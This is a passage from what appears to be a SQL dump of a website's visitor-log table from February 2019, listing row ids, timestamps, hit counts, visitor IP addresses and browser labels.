168.137','other'),(385965,1550138797,1,1,0,0,'46.229.168.147','other'),(385966,1550138845,1,1,0,0,'8.29.198.25','other'),(385967,1550139654,1,1,0,0,'91.196.178.103','chrome'),(385968,1550139706,1,1,0,0,'157.55.39.181','other'),(385969,1550139926,1,1,0,0,'91.196.177.46','firefox'),(385970,1550140300,1,1,0,0,'8.29.198.25','other'),(385971,1550140670,1,1,0,0,'46.229.168.148','other'),(385972,1550140934,1,1,0,0,'91.196.178.87','chrome'),(385973,1550141207,1,1,0,0,'66.249.66.44','chrome'),(385974,1550141222,1,1,0,0,'91.196.178.103','chrome'),(385975,1550141261,2,2,0,0,'66.249.66.152','chrome'),(385976,1550141262,2,2,0,0,'216.244.66.241','other'),(385977,1550141409,1,1,0,0,'46.229.168.151','other'),(385978,1550141446,1,1,0,0,'66.249.66.42','chrome'),(385979,1550141961,1,1,0,0,'95.163.255.97','other'),(385980,1550142975,1,1,0,0,'95.163.255.158','other'),(385981,1550142979,1,1,0,0,'95.163.255.195','other'),(385982,1550143184,1,1,0,0,'91.196.178.172','chrome'),(385983,1550143284,1,1,0,0,'66.249.66.154','chrome'),(385984,1550143347,1,1,0,0,'66.249.66.44','chrome'),(385985,1550143404,1,1,0,0,'46.229.168.149','other'),(385986,1550143420,1,1,0,0,'66.249.66.152','chrome'),(385987,1550144071,1,1,0,0,'46.229.168.147','other'),(385988,1550144504,1,1,0,0,'66.249.66.154','chrome'),(385989,1550144763,1,1,0,0,'91.196.177.46','firefox'),(385990,1550144865,1,1,0,0,'46.229.168.149','other'),(385991,1550145077,1,1,0,0,'46.229.168.144','other'),(385992,1550145433,1,1,0,0,'207.46.13.250','other'),(385993,1550145495,1,1,0,0,'46.229.168.148','other'),(385994,1550146227,1,1,0,0,'66.249.66.218','chrome'),(385995,1550146394,1,1,0,0,'207.46.13.9','other'),(385996,1550146502,1,1,0,0,'157.55.39.181','other'),(385997,1550146764,1,1,0,0,'217.118.86.61','firefox'),(385998,1550146795,3,3,0,0,'216.244.66.241','other'),(385999,1550146831,1,1,0,0,'5.188.210.53','chrome'),(386000,1550147103,1,1,0,0,'95.163.255.178','other'),(386001,1550147464,1,1,0,0,'194.44.199.121','chrome'),(386002,1550147559,1,1,0,0,'46.229.168.142','other'),(386003,1550147816,1,1,0,0,'180.76.15.30','other'),(386004,1550147983,1,1,0,0,'66.249.66.156','chrome'),(386005,1550148011,2,2,0,0,'157.55.39.241','other'),(386006,1550148579,1,1,0,0,'46.229.168.138','other'),(386007,1550148617,1,1,0,0,'91.196.178.87','chrome'),(386008,1550149227,2,2,0,0,'216.244.66.241','other'),(386009,1550149463,1,1,0,0,'46.229.168.144','other'),(386010,1550149464,1,1,0,0,'207.46.13.9','other'),(386011,1550149683,1,1,0,0,'8.29.198.27','other'),(386012,1550149792,1,1,0,0,'66.249.66.152','chrome'),(386013,1550150104,1,1,0,0,'109.70.100.20','chrome'),(386014,1550150110,1,1,0,0,'195.176.3.24','chrome'),(386015,1550150194,1,1,0,0,'199.249.230.76','chrome'),(386016,1550150229,1,1,0,0,'104.244.73.126','chrome'),(386017,1550150241,1,1,0,0,'91.196.178.87','chrome'),(386018,1550150271,1,1,0,0,'207.244.70.35','chrome'),(386019,1550150368,1,1,0,0,'199.249.230.66','chrome'),(386020,1550150588,1,1,0,0,'91.196.177.46','firefox'),(386021,1550150597,1,1,0,0,'91.211.135.105','chrome'),(386022,1550151044,1,1,0,0,'46.201.250.166','chrome'),(386023,1550151113,1,1,0,0,'109.70.100.19','chrome'),(386024,1550151150,1,1,0,0,'8.29.198.25','other'),(386025,1550151189,1,1,0,0,'199.249.230.75','chrome'),(386026,1550151200,1,1,0,0,'171.25.193.25','chrome'),(386027,1550151206,2,2,0,0,'207.46.13.130','other'),(386028,1550151369,2,1,1,0,'66.249.66.154',''),(386029,1550151737,2,2,0,0,'216.244.66.241','other'),(386030,1550152022,1,1,0,0,'46.229.168.151','other'),(386031,1550152286,1,1,0,0,'91.196.178.87','chrome'),(386032,1550153107,1,1,0,0,'46.229.168.142','other'),(386033,1550153130,1,1,0,0,'31.43.25.211','chrome'),(386034,1550153381,1,1,0,0,'157.55.39.241','other'),(386035,1550153436,1,1,0,0,'91.196.178.87','chrome'),(386036,1550153931,1,1,0,0,'199.249.230.72','chrome'),(386037,1550154501,1,1,0,0,'66.249.66.40','chrome'),(386038,1550154892,1,1,0,0,'43.245.136.236','chrome'),(386039,1550155004,1,1,0,0,'199.195.250.77','chrome'),(386040,1550155322,1,1,0,0,'46.229.168.140','other'),(386041,1550155560,1,1,0,0,'66.249.66.154','chrome'),(386042,1550155737,1,1,0,0,'46.229.168.153','other'),(386043,1550155836,1,1,0,0,'207.46.13.130','other'),(386044,1550156002,1,1,0,0,'199.249.230.71','chrome'),(386045,1550156021,1,1,0,0,'167.114.108.152','chrome'),(386046,1550156093,1,1,0,0,'66.249.66.218','chrome'),(386047,1550156271,1,1,0,0,'66.249.66.44','chrome'),(386048,1550156321,1,1,0,0,'178.93.59.51','chrome'),(386049,1550156960,1,1,0,0,'46.229.168.135','other'),(386050,1550157373,2,2,0,0,'66.249.66.154','chrome'),(386051,1550157900,1,1,0,0,'216.244.66.241','other'),(386052,1550158547,1,1,0,0,'95.163.255.187','other'),(386053,1550158703,1,1,0,0,'66.249.66.154','chrome'),(386054,1550159448,1,1,0,0,'157.55.39.241','other'),(386055,1550160053,1,1,0,0,'216.244.66.241','other'),(386056,1550160155,1,1,0,0,'46.229.168.136','other'),(386057,1550160339,1,1,0,0,'66.249.66.152','chrome'),(386058,1550160525,1,1,0,0,'8.29.198.26','other'),(386059,1550160814,1,1,0,0,'46.229.168.153','other'),(386060,1550161064,1,1,0,0,'207.46.13.10','other'),(386061,1550161360,1,1,0,0,'157.55.39.241','other'),(386062,1550162005,1,1,0,0,'8.29.198.27','other'),(386063,1550162152,2,2,0,0,'66.249.66.40','chrome'),(386064,1550162340,2,2,0,0,'66.249.66.154','chrome'),(386065,1550162570,1,1,0,0,'207.46.13.10','other'),(386066,1550162674,1,1,0,0,'66.249.66.156','chrome'),(386067,1550162822,1,1,0,0,'207.46.13.130','other'),(386068,1550163413,1,1,0,0,'66.249.66.154','chrome'),(386069,1550164508,1,1,0,0,'66.249.66.156','chrome'),(386070,1550164716,1,1,0,0,'46.229.168.148','other'),(386071,1550165129,1,1,0,0,'40.77.167.60','other'),(386072,1550165334,1,1,0,0,'66.249.66.154','chrome'),(386073,1550165648,1,1,0,0,'66.249.66.40','chrome'),(386074,1550165662,1,1,0,0,'109.70.100.22','chrome'),(386075,1550165766,1,1,0,0,'37.73.156.173','chrome'),(386076,1550165855,1,1,0,0,'207.46.13.130','other'),(386077,1550166070,1,1,0,0,'46.229.168.134','other'),(386078,1550166155,1,1,0,0,'46.229.168.133','other'),(386079,1550166319,1,1,0,0,'91.196.178.186','chrome'),(386080,1550166503,1,1,0,0,'95.163.255.95','other'),(386081,1550166960,1,1,0,0,'46.229.168.147','other'),(386082,1550167015,1,1,0,0,'46.229.168.153','other'),(386083,1550167155,1,1,0,0,'66.249.66.154','chrome'),(386084,1550167236,2,2,0,0,'216.244.66.241','other'),(386085,1550167788,1,1,0,0,'40.77.167.60','other'),(386086,1550168020,1,1,0,0,'66.249.66.40','chrome'),(386087,1550168200,6,6,0,0,'216.244.66.241','other'),(386088,1550168385,1,1,0,0,'37.54.149.237','firefox'),(386089,1550168394,1,1,0,0,'157.55.39.92','other'),(386090,1550168713,1,1,0,0,'66.249.66.152','chrome'),(386091,1550169134,1,1,0,0,'46.229.168.152','other'),(386092,1550170370,1,1,0,0,'46.229.168.145','other'),(386093,1550171068,1,1,0,0,'216.244.66.241','other'),(386094,1550171370,1,1,0,0,'8.29.198.26','other'),(386095,1550171489,1,1,0,0,'54.36.149.210','other'),(386096,1550171546,1,1,0,0,'66.249.66.152','chrome'),(386097,1550171723,1,1,0,0,'46.229.168.146','other'),(386098,1550171757,1,1,0,0,'40.77.167.60','other'),(386099,1550171797,1,1,0,0,'91.209.11.236','other'),(386100,1550171959,1,1,0,0,'95.163.255.99','other'),(386101,1550172041,1,1,0,0,'40.77.167.131','other'),(386102,1550172848,1,1,0,0,'8.29.198.27','other'),(386103,1550172921,1,1,0,0,'66.249.66.154','chrome'),(386104,1550172985,1,1,0,0,'46.229.168.150','other'),(386105,1550173194,1,1,0,0,'40.77.167.60','other'),(386106,1550173287,1,1,0,0,'66.249.66.40','chrome'),(386107,1550173436,1,1,0,0,'157.55.39.92','other'),(386108,1550173479,1,1,0,0,'66.249.66.156','chrome'),(386109,1550173555,1,1,0,0,'180.76.15.150','other'),(386110,1550173593,1,1,0,0,'178.137.87.36','msie'),(386111,1550173926,1,1,0,0,'91.196.178.130','firefox'),(386112,1550174010,5,5,0,0,'216.244.66.241','other'),(386113,1550175577,2,2,0,0,'66.249.66.154','chrome'),(386114,1550176469,4,4,0,0,'216.244.66.241','other'),(386115,1550176578,1,1,0,0,'66.249.66.40','chrome'),(386116,1550177193,1,1,0,0,'91.196.178.60','chrome'),(386117,1550177486,1,1,0,0,'13.57.233.99','chrome'),(386118,1550177659,1,1,0,0,'66.249.66.156','chrome'),(386119,1550177662,1,1,0,0,'95.163.255.97','other'),(386120,1550177865,1,1,0,0,'66.249.66.44','chrome'),(386121,1550179174,2,2,0,0,'216.244.66.241','other'),(386122,1550179196,1,1,0,0,'66.249.66.156','chrome'),(386123,1550179883,1,1,0,0,'66.249.66.40','chrome'),(386124,1550179994,2,2,0,0,'66.249.66.152','chrome'),(386125,1550180095,1,1,0,0,'157.55.39.157','other'),(386126,1550180369,1,1,0,0,'46.229.168.133','other'),(386127,1550180418,2,2,0,0,'66.249.66.42','chrome'),(386128,1550180546,1,1,0,0,'46.229.168.152','other'),(386129,1550180627,1,1,0,0,'66.249.66.44','chrome'),(386130,1550180723,1,1,0,0,'95.163.255.150','other'),(386131,1550181188,1,1,0,0,'66.249.66.156','chrome'),(386132,1550181397,2,2,0,0,'66.249.66.152','chrome'),(386133,1550182075,1,1,0,0,'216.244.66.241','other'),(386134,1550182209,1,1,0,0,'8.29.198.26','other'),(386135,1550182432,2,2,0,0,'66.249.66.152','chrome'),(386136,1550183426,1,1,0,0,'207.46.13.70','other'),(386137,1550183691,1,1,0,0,'94.244.143.86','firefox'),(386138,1550183701,1,1,0,0,'8.29.198.27','other'),(386139,1550183775,1,1,0,0,'46.229.168.137','other'),(386140,1550183973,1,1,0,0,'46.229.168.133','other'),(386141,1550184172,1,1,0,0,'46.229.168.147','other'),(386142,1550184233,1,1,0,0,'157.55.39.157','other'),(386143,1550184798,4,4,0,0,'216.244.66.241','other'),(386144,1550185491,1,1,0,0,'46.229.168.129','other'),(386145,1550185640,1,1,0,0,'66.249.66.154','chrome'),(386146,1550185733,1,1,0,0,'66.249.66.42','chrome'),(386147,1550186668,1,1,0,0,'207.46.13.123','other'),(386148,1550186785,1,1,0,0,'66.249.66.40','chrome'),(386149,1550187115,1,1,0,0,'46.229.168.129','other'),(386150,1550187249,1,1,0,0,'46.229.168.153','other'),(386151,1550187695,1,1,0,0,'66.249.66.40','chrome'),(386152,1550187901,1,1,0,0,'66.249.66.156','chrome'),(386153,1550187985,1,1,0,0,'66.249.66.154','chrome'),(386154,1550188040,1,1,0,0,'66.249.66.152','chrome'),(386155,1550188574,1,1,0,0,'95.163.255.95','other'),(386156,1550188740,6,6,0,0,'69.30.202.138','other'),(386157,1550188957,1,1,0,0,'207.46.13.70','other'),(386158,1550189588,1,1,0,0,'66.249.66.152','chrome'),(386159,1550189616,1,1,0,0,'46.229.168.140','other'),(386160,1550190288,1,1,0,0,'66.249.66.154','chrome'),(386161,1550190883,25,25,0,0,'173.249.8.50','other'),(386162,1550191674,1,1,0,0,'46.229.168.146','other'),(386163,1550191795,1,1,0,0,'46.229.168.153','other'),(386164,1550191807,1,1,0,0,'40.77.167.7','other'),(386165,1550192190,1,1,0,0,'157.55.39.109','other'),(386166,1550192304,1,1,0,0,'46.229.168.141','other'),(386167,1550192562,2,2,0,0,'66.249.66.156','chrome'),(386168,1550192700,1,1,0,0,'46.229.168.130','other'),(386169,1550193043,1,1,0,0,'95.163.255.170','other'),(386170,1550193048,1,1,0,0,'8.29.198.25','other'),(386171,1550193096,1,1,0,0,'46.229.168.136','other'),(386172,1550193432,1,1,0,0,'216.244.66.241','other'),(386173,1550193948,1,1,0,0,'51.15.21.189','other'),(386174,1550194171,1,1,0,0,'207.46.13.67','other'),(386175,1550194464,2,2,0,0,'66.249.66.156','chrome'),(386176,1550194548,3,3,0,0,'157.55.39.109','other'),(386177,1550194550,1,1,0,0,'8.29.198.26','other'),(386178,1550194717,1,1,0,0,'46.229.168.136','other'),(386179,1550195230,4,4,0,0,'40.77.167.57','other'),(386180,1550195244,1,1,0,0,'40.77.167.7','other'),(386181,1550195808,1,1,0,0,'216.244.66.241','other'),(386182,1550196467,1,1,0,0,'66.249.66.152','chrome'),(386183,1550196898,1,1,0,0,'46.229.168.130','other'),(386184,1550198018,1,1,0,0,'66.249.66.40','chrome'),(386185,1550198625,1,1,0,0,'95.163.255.155','other'),(386186,1550198637,1,1,0,0,'216.244.66.241','other'),(386187,1550198738,2,2,0,0,'66.249.66.152','chrome'),(386188,1550199688,1,1,0,0,'40.77.167.204','other'),(386189,1550200087,1,1,0,0,'66.249.66.156','chrome'),(386190,1550200350,1,1,0,0,'46.229.168.147','other'),(386191,1550200890,1,1,0,0,'66.249.66.154','chrome'),(386192,1550200979,1,1,0,0,'40.77.167.204','other'),(386193,1550201212,1,1,0,0,'40.77.167.150','other'),(386194,1550201218,2,2,0,0,'66.249.66.152','chrome'),(386195,1550201352,1,1,0,0,'46.229.168.132','other'),(386196,1550201450,1,1,0,0,'216.244.66.241','other'),(386197,1550201624,1,1,0,0,'46.229.168.136','other'),(386198,1550202024,1,1,0,0,'5.45.207.79','other'),(386199,1550202283,1,1,0,0,'46.229.168.132','other'),(386200,1550203029,2,2,0,0,'66.249.66.152','chrome'),(386201,1550203094,1,1,0,0,'66.249.66.156','chrome'),(386202,1550203886,1,1,0,0,'8.29.198.27','other'),(386203,1550204321,1,1,0,0,'95.163.255.97','other'),(386204,1550204380,1,1,0,0,'157.55.39.109','other'),(386205,1550204968,1,1,0,0,'46.229.168.132','other'),(386206,1550205042,1,1,0,0,'180.76.15.25','other'),(386207,1550205132,1,1,0,0,'46.229.168.153','other'),(386208,1550205387,1,1,0,0,'8.29.198.27','other'),(386209,1550206076,1,1,0,0,'46.229.168.141','other'),(386210,1550206721,1,1,0,0,'157.55.39.109','other'),(386211,1550206924,1,1,0,0,'216.244.66.241','other'),(386212,1550207490,2,2,0,0,'66.249.66.44','chrome'),(386213,1550207628,1,1,0,0,'46.229.168.134','other'),(386214,1550208423,1,1,0,0,'66.249.66.156','chrome'),(386215,1550208778,3,3,0,0,'216.244.66.241','other'),(386216,1550208946,208,208,0,0,'5.9.98.234','other'),(386217,1550209113,2,2,0,0,'46.229.168.149','other'),(386218,1550209362,1,1,0,0,'46.229.168.151','other'),(386219,1550209674,1,1,0,0,'40.77.167.13','other'),(386220,1550210378,1,1,0,0,'46.229.168.151','other'),(386221,1550210547,4,4,0,0,'66.249.66.154','chrome'),(386222,1550210831,1,1,0,0,'66.249.66.156','chrome'),(386223,1550211101,1,1,0,0,'157.55.39.97','other'),(386224,1550211143,1,1,0,0,'109.70.100.20','other'),(386225,1550211609,2,2,0,0,'54.191.136.27','chrome'),(386226,1550211965,1,1,0,0,'46.229.168.130','other'),(386227,1550211989,1,1,0,0,'157.55.39.121','other'),(386228,1550212039,1,1,0,0,'66.249.66.152','chrome'),(386229,1550212412,1,1,0,0,'91.196.178.76','chrome'),(386230,1550212559,1,1,0,0,'46.229.168.134','other'),(386231,1550212779,1,1,0,0,'46.229.168.151','other'),(386232,1550212782,1,1,0,0,'157.55.39.97','other'),(386233,1550212935,1,1,0,0,'46.229.168.133','other'),(386234,1550213893,1,1,0,0,'5.188.210.53','chrome'),(386235,1550214046,1,1,0,0,'66.249.66.222','chrome'),(386236,1550214155,1,1,0,0,'77.111.244.242','chrome'),(386237,1550214181,1,1,0,0,'46.229.168.132','other'),(386238,1550214459,1,1,0,0,'139.162.72.149','firefox'),(386239,1550214489,1,1,0,0,'40.77.167.60','other'),(386240,1550214495,1,1,0,0,'77.111.244.66','chrome'),(386241,1550214720,1,1,0,0,'8.29.198.25','other'),(386242,1550214885,1,1,0,0,'157.55.39.97','other'),(386243,1550215185,1,1,0,0,'213.108.41.211','chrome'),(386244,1550215210,1,1,0,0,'66.249.66.156','chrome'),(386245,1550215322,1,1,0,0,'216.244.66.241','other'),(386246,1550215453,1,1,0,0,'157.55.39.177','other'),(386247,1550215553,1,1,0,0,'66.249.66.44','chrome'),(386248,1550215912,1,1,0,0,'46.229.168.132','other'),(386249,1550216135,1,1,0,0,'66.249.66.42','chrome'),(386250,1550216223,1,1,0,0,'8.29.198.27','other'),(386251,1550216493,1,1,0,0,'46.229.168.142','other'),(386252,1550216652,2,2,0,0,'148.251.9.145','other'),(386253,1550216748,1,1,0,0,'5.58.204.66','chrome'),(386254,1550216782,1,1,0,0,'66.249.66.154','chrome'),(386255,1550217171,1,1,0,0,'195.230.119.59','chrome'),(386256,1550217260,1,1,0,0,'162.210.196.129','other'),(386257,1550217271,1,1,0,0,'188.163.18.159','chrome'),(386258,1550217339,1,1,0,0,'46.201.250.166','chrome'),(386259,1550217422,1,1,0,0,'46.229.168.135','other'),(386260,1550217838,1,1,0,0,'66.249.66.156','chrome'),(386261,1550217981,2,2,0,0,'216.244.66.241','other'),(386262,1550218544,1,1,0,0,'157.55.39.172','other'),(386263,1550218832,1,1,0,0,'66.249.66.156','chrome'),(386264,1550218974,1,1,0,0,'60.191.38.77','firefox'),(386265,1550219058,1,1,0,0,'66.249.66.154','chrome'),(386266,1550219550,1,1,0,0,'95.163.255.189','other'),(386267,1550219707,1,1,0,0,'46.229.168.129','other'),(386268,1550219988,1,1,0,0,'66.249.66.154','chrome'),(386269,1550220184,1,1,0,0,'66.249.66.44','chrome'),(386270,1550220257,1,1,0,0,'157.55.39.177','other'),(386271,1550220351,3,3,0,0,'91.196.177.15','chrome'),(386272,1550220575,2,2,0,0,'216.244.66.241','other'),(386273,1550221208,1,1,0,0,'46.229.168.143','other'),(386274,1550221705,1,1,0,0,'94.178.105.179','firefox'),(386275,1550222067,1,1,0,0,'216.244.66.241','other'),(386276,1550222110,1,1,0,0,'91.196.178.81','chrome'),(386277,1550222358,1,1,0,0,'93.170.117.29','chrome'),(386278,1550223126,1,1,0,0,'216.244.66.241','other'),(386279,1550223200,1,1,0,0,'66.249.66.44','chrome'),(386280,1550223512,1,1,0,0,'91.196.178.81','chrome'),(386281,1550223601,1,1,0,0,'91.196.178.68','firefox'),(386282,1550223655,1,1,0,0,'31.43.25.211','chrome'),(386283,1550223819,1,1,0,0,'173.249.63.71','other'),(386284,1550223902,1,1,0,0,'207.46.13.76','other'),(386285,1550223908,1,1,0,0,'91.196.178.167','chrome'),(386286,1550224563,2,2,0,0,'91.196.178.81','chrome'),(386287,1550224589,1,1,0,0,'31.13.127.2','other'),(386288,1550224594,1,1,0,0,'66.220.149.4','other'),(386289,1550224629,1,1,0,0,'91.124.182.170','firefox'),(386290,1550224643,1,1,0,0,'31.13.115.10','other'),(386291,1550224694,1,1,0,0,'37.73.135.137','chrome'),(386292,1550224711,1,1,0,0,'91.196.177.46','firefox'),(386293,1550224831,1,1,0,0,'93.73.182.111','firefox'),(386294,1550224878,1,1,0,0,'188.239.14.34','chrome'),(386295,1550224955,1,1,0,0,'46.133.225.109','chrome'),(386296,1550224989,1,1,0,0,'69.171.251.6','msie'),(386297,1550225050,1,1,0,0,'66.249.66.154','chrome'),(386298,1550225075,1,1,0,0,'91.196.178.103','chrome'),(386299,1550225251,1,1,0,0,'94.178.147.148','chrome'),(386300,1550225409,1,1,0,0,'66.249.66.156','chrome'),(386301,1550225557,2,2,0,0,'66.249.66.152','chrome'),(386302,1550225577,1,1,0,0,'8.29.198.25','other'),(386303,1550225631,1,1,0,0,'46.229.168.135','other'),(386304,1550225724,1,1,0,0,'91.124.182.170','firefox'),(386305,1550225885,2,2,0,0,'91.196.178.81','chrome'),(386306,1550226066,1,1,0,0,'180.76.15.141','other'),(386307,1550226087,1,1,0,0,'91.196.178.3','other'),(386308,1550226093,1,1,0,0,'157.55.39.194','other'),(386309,1550226234,1,1,0,0,'178.251.108.137','chrome'),(386310,1550226246,1,1,0,0,'66.249.66.42','chrome'),(386311,1550226309,1,1,0,0,'216.244.66.241','other'),(386312,1550226328,1,1,0,0,'66.249.66.154','chrome'),(386313,1550226336,1,1,0,0,'66.249.66.40','chrome'),(386314,1550226361,1,1,0,0,'91.196.178.94','chrome'),(386315,1550226386,1,1,0,0,'66.249.66.156','chrome'),(386316,1550226610,1,1,0,0,'46.229.168.146','other'),(386317,1550226617,1,1,0,0,'91.196.178.68','firefox'),(386318,1550227063,1,1,0,0,'8.29.198.27','other'),(386319,1550227328,1,1,0,0,'66.249.66.154','chrome'),(386320,1550227575,1,1,0,0,'207.46.13.68','other'),(386321,1550227719,1,1,0,0,'213.108.45.138','chrome'),(386322,1550227772,1,1,0,0,'37.9.113.103','other'),(386323,1550227948,1,1,0,0,'91.124.182.170','firefox'),(386324,1550228065,1,1,0,0,'180.76.15.8','other'),(386325,1550228149,1,1,0,0,'66.249.66.156','chrome'),(386326,1550228173,1,1,0,0,'46.96.26.29','chrome'),(386327,1550228245,1,1,0,0,'91.196.178.83','chrome'),(386328,1550228257,1,1,0,0,'46.229.168.137','other'),(386329,1550228294,2,2,0,0,'66.249.66.154','chrome'),(386330,1550228333,1,1,0,0,'37.73.184.21','chrome'),(386331,1550228422,1,1,0,0,'46.164.136.106','firefox'),(386332,1550228480,1,1,0,0,'207.46.13.76','other'),(386333,1550228536,1,1,0,0,'91.196.177.46','firefox'),(386334,1550228665,1,1,0,0,'82.145.211.66','other'),(386335,1550228707,1,1,0,0,'66.249.66.44','chrome'),(386336,1550228865,1,1,0,0,'91.196.178.169','chrome'),(386337,1550229321,1,1,0,0,'77.111.247.46','chrome'),(386338,1550229461,1,1,0,0,'91.196.178.80','chrome'),(386339,1550229462,1,1,0,0,'91.196.178.101','chrome'),(386340,1550229765,1,1,0,0,'207.46.13.76','other'),(386341,1550229964,1,1,0,0,'66.249.66.42','chrome'),(386342,1550229991,1,1,0,0,'91.196.178.83','chrome'),(386343,1550230209,1,1,0,0,'94.100.221.234','chrome'),(386344,1550230633,1,1,0,0,'66.249.66.44','chrome'),(386345,1550230652,1,1,0,0,'95.163.255.169','other'),(386346,1550230937,1,1,0,0,'66.249.66.42','chrome'),(386347,1550231086,3,3,0,0,'216.244.66.241','other'),(386348,1550231165,1,1,0,0,'93.170.68.85','chrome'),(386349,1550231898,1,1,0,0,'46.211.53.51','chrome'),(386350,1550232221,1,1,0,0,'91.196.177.46','firefox'),(386351,1550232531,1,1,0,0,'66.220.149.31','other'),(386352,1550232702,1,1,0,0,'66.249.66.156','chrome'),(386353,1550232752,1,1,0,0,'46.229.168.143','other'),(386354,1550233087,1,1,0,0,'91.124.182.170','firefox'),(386355,1550233242,1,1,0,0,'66.249.66.40','chrome'),(386356,1550233347,1,1,0,0,'108.59.8.70','other'),(386357,1550233990,1,1,0,0,'216.244.66.241','other'),(386358,1550234040,1,1,0,0,'66.249.66.156','chrome'),(386359,1550234303,1,1,0,0,'91.196.177.165','chrome'),(386360,1550234317,1,1,0,0,'66.249.66.44','chrome'),(386361,1550234320,1,1,0,0,'157.55.39.194','other'),(386362,1550234563,1,1,0,0,'91.196.178.94','chrome'),(386363,1550234576,1,1,0,0,'95.132.8.204','chrome'),(386364,1550234804,2,2,0,0,'66.249.66.152','chrome'),(386365,1550234960,1,1,0,0,'91.124.182.170','firefox'),(386366,1550235408,1,1,0,0,'66.249.66.154','chrome'),(386367,1550235834,1,1,0,0,'46.229.168.151','other'),(386368,1550235855,1,1,0,0,'91.196.178.92','chrome'),(386369,1550235980,2,2,0,0,'207.46.13.76','other'),(386370,1550236026,1,1,0,0,'188.163.53.227','firefox'),(386371,1550236420,1,1,0,0,'8.29.198.27','other'),(386372,1550236469,1,1,0,0,'46.166.190.149','other'),(386373,1550236488,1,1,0,0,'157.55.39.194','other'),(386374,1550236577,1,1,0,0,'95.134.117.133','chrome'),(386375,1550236825,1,1,0,0,'66.249.66.152','chrome'),(386376,1550236867,1,1,0,0,'95.163.255.99','other'),(386377,1550236940,1,1,0,0,'91.196.178.162','chrome'),(386378,1550236944,2,2,0,0,'216.244.66.241','other'),(386379,1550237182,1,1,0,0,'46.229.168.141','other'),(386380,1550237284,1,1,0,0,'66.249.66.156','chrome'),(386381,1550237327,1,1,0,0,'157.55.39.172','other'),(386382,1550237427,1,1,0,0,'91.196.178.84','chrome'),(386383,1550237487,1,1,0,0,'91.196.178.25','chrome'),(386384,1550237603,1,1,0,0,'46.229.168.132','other'),(386385,1550237620,1,1,0,0,'207.46.13.68','other'),(386386,1550237784,1,1,0,0,'62.205.134.182','msie'),(386387,1550237853,1,1,0,0,'94.100.221.234','chrome'),(386388,1550237894,1,1,0,0,'8.29.198.25','other'),(386389,1550238125,1,1,0,0,'46.211.46.105','chrome'),(386390,1550238379,1,1,0,0,'216.244.66.241','other'),(386391,1550238413,1,1,0,0,'130.180.220.216','chrome'),(386392,1550238598,1,1,0,0,'46.229.168.148','other'),(386393,1550238731,2,2,0,0,'91.196.178.94','chrome'),(386394,1550238940,1,1,0,0,'66.249.66.40','chrome'),(386395,1550239326,1,1,0,0,'91.196.178.23','chrome'),(386396,1550239336,1,1,0,0,'216.244.66.241','other'),(386397,1550239514,1,1,0,0,'66.249.66.156','chrome'),(386398,1550239515,1,1,0,0,'37.53.123.48','chrome'),(386399,1550239588,1,1,0,0,'40.77.167.151','other'),(386400,1550239763,1,1,0,0,'91.196.178.162','chrome'),(386401,1550239791,1,1,0,0,'66.249.66.42','chrome'),(386402,1550239871,1,1,0,0,'157.55.39.119','other'),(386403,1550239986,1,1,0,0,'40.77.167.136','other'),(386404,1550240045,1,1,0,0,'46.229.168.145','other'),(386405,1550240186,1,1,0,0,'77.111.247.162','chrome'),(386406,1550240294,1,1,0,0,'66.249.66.220','chrome'),(386407,1550240504,1,1,0,0,'91.196.178.132','chrome'),(386408,1550241016,1,1,0,0,'46.96.37.255','chrome'),(386409,1550241087,2,2,0,0,'157.55.39.119','other'),(386410,1550241167,1,1,0,0,'173.252.127.5','other'),(386411,1550241168,1,1,0,0,'173.252.127.30','other'),(386412,1550241566,1,1,0,0,'46.118.236.20','chrome'),(386413,1550241612,1,1,0,0,'95.163.255.97','other'),(386414,1550241782,1,1,0,0,'40.77.167.151','other'),(386415,1550241846,1,1,0,0,'66.249.66.156','chrome'),(386416,1550241897,2,2,0,0,'157.55.39.194','other'),(386417,1550241955,1,1,0,0,'46.211.53.127','chrome'),(386418,1550242401,1,1,0,0,'95.163.255.166','other'),(386419,1550242460,1,1,0,0,'82.207.123.107','chrome'),(386420,1550242606,1,1,0,0,'40.77.167.96','other'),(386421,1550242749,1,1,0,0,'91.196.178.68','chrome'),(386422,1550242768,1,1,0,0,'73.71.199.118','firefox'),(386423,1550242881,1,1,0,0,'95.163.255.155','other'),(386424,1550243347,1,1,0,0,'66.249.65.198','chrome'),(386425,1550243580,2,2,0,0,'149.202.82.11','other'),(386426,1550243584,2,2,0,0,'192.99.10.47','other'),(386427,1550243953,1,1,0,0,'46.211.26.96','chrome'),(386428,1550243975,1,1,0,0,'5.45.207.19','other'),(386429,1550244002,1,1,0,0,'91.196.178.132','chrome'),(386430,1550244577,1,1,0,0,'66.249.65.196','chrome'),(386431,1550244864,1,1,0,0,'46.229.168.150','other'),(386432,1550244884,2,2,0,0,'216.244.66.241','other'),(386433,1550245023,1,1,0,0,'40.77.167.151','other'),(386434,1550245124,1,1,0,0,'93.170.25.34','chrome'),(386435,1550245495,1,1,0,0,'207.46.13.223','other'),(386436,1550245682,1,1,0,0,'66.249.65.194','chrome'),(386437,1550245829,1,1,0,0,'46.229.168.138','other'),(386438,1550246007,1,1,0,0,'91.196.177.131','chrome'),(386439,1550246193,1,1,0,0,'157.55.39.119','other'),(386440,1550246219,1,1,0,0,'40.77.167.127','other'),(386441,1550246458,1,1,0,0,'207.46.13.223','other'),(386442,1550246995,1,1,0,0,'82.145.208.178','other'),(386443,1550247108,1,1,0,0,'37.53.111.115','chrome'),(386444,1550247162,1,1,0,0,'66.249.65.198','chrome'),(386445,1550247264,1,1,0,0,'8.29.198.25','other'),(386446,1550247320,1,1,0,0,'66.249.73.30','chrome'),(386447,1550247395,2,2,0,0,'157.55.39.119','other'),(386448,1550247399,6,6,0,0,'40.77.167.127','other'),(386449,1550247405,4,4,0,0,'40.77.167.10','other'),(386450,1550247474,1,1,0,0,'66.249.65.194','chrome'),(386451,1550247586,1,1,0,0,'188.147.106.221','chrome'),(386452,1550247606,8,8,0,0,'40.77.167.151','other'),(386453,1550248149,1,1,0,0,'95.163.255.98','other'),(386454,1550248288,1,1,0,0,'95.163.255.196','other'),(386455,1550248434,1,1,0,0,'157.55.39.119','other'),(386456,1550248747,1,1,0,0,'8.29.198.26','other'),(386457,1550249516,1,1,0,0,'46.133.158.165','chrome'),(386458,1550249743,1,1,0,0,'37.53.111.115','chrome'),(386459,1550249875,1,1,0,0,'91.196.178.133','chrome'),(386460,1550250011,5,5,0,0,'216.244.66.241','other'),(386461,1550250255,1,1,0,0,'40.77.167.10','other'),(386462,1550250282,1,1,0,0,'91.196.178.41','chrome'),(386463,1550250371,1,1,0,0,'195.77.80.87','other'),(386464,1550250454,1,1,0,0,'46.229.168.146','other'),(386465,1550250628,1,1,0,0,